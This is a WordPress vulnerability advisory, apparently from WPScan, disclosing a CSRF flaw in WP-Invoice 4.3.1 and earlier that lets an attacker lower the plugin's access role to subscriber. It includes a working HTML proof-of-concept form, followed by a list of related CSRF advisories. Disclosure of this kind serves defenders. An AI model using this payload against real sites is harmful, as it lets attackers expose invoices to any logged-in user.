WP-Invoice <= 4.3.1 – Arbitrary Settings Update via CSRF | Plugin Vulnerabilities

Description

The plugin does not have CSRF check in place when updating its settings, which could allow attacker to make a logged in admin update them and change the minimum role allowed to access the plugin's features to subscriber for example, which would make invoices available to any authenticated users

Proof of Concept

<html>
  <body>
    <form action="https://example.com/wp-admin/admin.php?page=wpi_page_settings" method="POST">
      <input type="hidden" name="wpi_settings_update" value="true" />
      <input type="hidden" name="wpi_settings[user_level]" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

No known fix

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

ba760ada-1db7-43b4-a6c4-3a5efe888471

Timeline

Publicly Published

2022-04-27 (about 4 years ago)

Added

2022-04-27 (about 4 years ago)

Last Updated

2022-04-27 (about 4 years ago)

Other

Published

Title

Published

2025-05-16

Title

Import Export For WooCommerce <= 1.6.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-09-24

Title

Di Themes Demo Site Importer <= 1.2 - Cross-Site Request Forgery

Published

2023-10-22

Title

Wp Ultimate Review < 2.3.1 - Settings Update via CSRF

Published

2025-04-09

Title

Custom Posts Order <= 4.4 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-08-22

Title

Restore Permanently delete Post or Page Data <= 1.0 - Cross-Site Request Forgery